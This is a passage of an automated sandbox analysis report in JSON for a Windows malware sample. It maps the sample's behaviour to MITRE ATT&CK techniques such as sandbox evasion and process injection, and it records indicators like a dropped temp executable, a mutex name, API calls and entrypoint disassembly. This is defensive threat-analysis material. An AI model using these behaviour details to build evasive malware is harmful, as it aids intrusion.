Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 2, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\pctfjohcnupctfjohcnupctfjo\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"pctfjohcnupctfjohcnupctfjo\"\n \"Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"gegdsimsogm.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895\" file has an entrypoint instructions - \"push\t0x60,push\t0x40a128,call\t0x4068cc,mov\tedi, 0x94,mov\teax, edi,call\t0x406a30,mov\tdword ptr [ebp - 0x18], esp,mov\tesi, esp,mov\tdword ptr [esi], edi,push\tesi,call\tdword ptr [0x40a058],mov\tecx, dword ptr [esi + 0x10],mov\tdword ptr [0x46d428], ecx,mov\teax, dword ptr [esi + 4],mov\tdword ptr [0x46d434], eax,mov\tedx, dword ptr [esi + 8],mov\tdword ptr [0x46d438], edx,mov\tesi, dword ptr [esi + 0xc],and\tesi, 0x7fff,mov\tdword ptr [0x46d42c], esi,cmp\tecx, 2,je\t0x405ba2,or\tesi, 0x8000,mov\tdword ptr [0x46d42c], esi,shl\teax, 8,\"\n \"gegdsimsogm.exe\" file has an entrypoint instructions - \"push\t0x60,push\t0x42b7f8,call\t0x42238c,mov\tedi, 0x94,mov\teax, edi,call\t0x421df0,mov\tdword ptr [ebp - 0x18], esp,mov\tesi, esp,mov\tdword ptr [esi], edi,push\tesi,call\tdword ptr [0x42a084],mov\tecx, dword ptr [esi + 0x10],mov\tdword ptr [0x463b28], ecx,mov\teax, dword ptr [esi + 4],mov\tdword ptr [0x463b34], eax,mov\tedx, dword ptr [esi + 8],mov\tdword ptr [0x463b38], edx,mov\tesi, dword ptr [esi + 0xc],and\tesi, 0x7fff,mov\tdword ptr [0x463b2c], esi,cmp\tecx, 2,je\t0x422bf3,or\tesi, 0x8000,mov\tdword ptr [0x463b2c], esi,shl\teax, 8,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71cc0000\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" loaded module \"KERNEL32\" at base 763f0000\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6aab0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f4d976@RPCRT4.dll\"\n \"15001600c03eb46a@ADVAPI32.dll\"\n \"0e000f00703fb46a@ADVAPI32.dll\"\n \"0e000f00cc3fb46a@ADVAPI32.dll\"\n \"11001200b447b46a@ADVAPI32.dll\"\n \"110012004848b46a@ADVAPI32.dll\"\n \"120013008c48b46a@ADVAPI32.dll\"\n \"12001300e448b46a@ADVAPI32.dll\"\n \"14001500386eb46a@ADVAPI32.dll\"\n \"14001500506eb46a@ADVAPI32.dll\"\n \"14001500686eb46a@ADVAPI32.dll\"\n \"17001800806eb46a@ADVAPI32.dll\"\n \"0d000e00986eb46a@ADVAPI32.dll\"\n \"11001200a86eb46a@ADVAPI32.dll\"\n \"11001200bc6eb46a@ADVAPI32.dll\"\n \"0d000e003449b46a@SHELL32.dll\"\n \"0d000e00b049b46a@SHELL32.dll\"\n \"0f001000fc6fb46a@ADVAPI32.dll\"\n \"140015003c70b46a@ADVAPI32.dll\"\n \"140015005470b46a@ADVAPI32.dll\"\n \"0c000d009c70b46a@ADVAPI32.dll\"\n \"0c000d00ac70b46a@ADVAPI32.dll\"\n \"0e000f00bc70b46a@ADVAPI32.dll\"\n \"0e000f00cc70b46a@ADVAPI32.dll\"\n \"0b000c00dc70b46a@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006024)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 769B0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"gegdsimsogm.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"gegdsimsogm.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"gegdsimsogm.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895\" has an executable section named \".text\"\n \"gegdsimsogm.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895\" has an writable section named \".data\"\n \"gegdsimsogm.exe\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895\" was detected as \"Microsoft visual C++ 7.0\"\n \"gegdsimsogm.exe\" was detected as \"Microsoft visual C++ 7.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"gegdsimsogm.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\gegdsimsogm.exe]- [targetUID: 00000000-00006024]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"c:\\6625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\6625B374340B41EF873CD09B09719BD85D778D15C530E4E87C60F52EA5879B895.EXE\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\GEGDSIMSOGM.EXE\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL 